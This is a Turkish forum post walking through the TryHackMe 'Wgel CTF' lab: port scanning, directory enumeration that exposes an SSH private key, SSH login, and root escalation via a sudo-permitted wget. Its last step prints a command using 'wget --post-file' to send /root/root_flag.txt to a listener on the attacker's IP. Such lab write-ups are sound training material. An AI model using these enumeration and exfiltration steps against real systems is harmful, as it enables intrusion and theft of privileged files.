TryHackMe: Wgel CTF Çözümleri

x4807

Katılımcı Üye
10 Ağu 2019
985
17
TryHackMe: Wgel CTF Çözümleri

https://tryhackme.com/room/wgelctf

Zorluk Seviyesi: Kolay

Amaç: root ve user bayraklarına erişmek.


Nmap taraması gerçekleştirdiğimizde 22. ve 80. yani ssh ve http portlarının açık olduğunu görüyoruz.

Kod:
nmap -sC -sV 10.10.200.254

WKMPKy.jpg


80. port ile websiteye girdiğimzide bizi klasik apache ekranı karşılıyor ancak kaynak kodlarını incelediğimizde dikkatimizi çeken bir isim ile karşılaşıyoruz.

BWf90Q.jpg


Websitesine "common.txt" dosyası ile gobuster taraması gerçekleştirdiğimizde websitenin sitemap'i ile karşılaşıyoruz. Ancak siteyi araştırdığımızda hiçbir şey ile karşılaşamıyoruz. Aynı şekilde sitemap directorysine gobuster taraması gerçekleştirdiğimizde ise içerisinde ssh id barındıran bir directory ile karşılaşıyoruz. Bulduğumuz ssh id'yi indiriyoruz.
(http://10.10.200.254/sitemap/.ssh/)

Kod:
gobuster dir -u  http://10.10.200.254/sitemap -w /usr/share/dirb/wordlists/common.txt
3VB7Q2.jpg



İndirmiş olduğumuz ssh id ve kaynak kodunda bulduğumuz isim ile yaptığımız nmap taramasında açık olduğunu gördüğümüz ssh portuna giriş yapmaya çalıştığımızda başarılı oluyoruz.
Kod:
[CENTER][COLOR=White]ssh -i id_rsa [email protected][/COLOR][/CENTER]
dJb207.jpg



Klasörlerin içerisinde biraz dolaştığımızda "********s" klasörünün içerisinde "user_flag.txt" isimli bir dosya ile karşılaşıyoruz. Açtığımızda user flagini görüyoruz.


bS49GC.jpg


"sudo -l" komutu ile bağlantı kurduğumuz "jessie" kullanıcısın root yetkisine sahip olduğu alanları incelediğimizde wget ile karşılaşıyoruz. İnternette biraz araştırma sonucu wget ile privilege escalation yapabileceğimizi görüyoruz.

QyNbMR.jpg


(https://www.hackingarticles.in/linux-for-pentester-wget-privilege-escalation/)

Netcat üzerinden 4445. portu dinlemeye alıyoruz. Dinlemeye aldıktan sonra bağlanmış olduğumuz ssh üzerinden wget ile yetki yükseltimi için gerekli olan kodu girdiğimizde netcatde root flagi ile karşılaşıyoruz.
Kod:
[CENTER][COLOR=White]sudo /usr/bin/wget --post-file=/root/root_flag.txt http://10.9.92.145:4445[/COLOR][/CENTER]
GHJ7JL.jpg
 
Son düzenleme:
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.